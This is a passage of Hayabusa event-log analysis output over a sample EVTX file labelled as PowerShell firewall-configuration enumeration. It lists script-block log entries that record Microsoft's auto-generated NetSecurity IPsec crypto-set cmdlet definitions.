$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeCryptoSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] 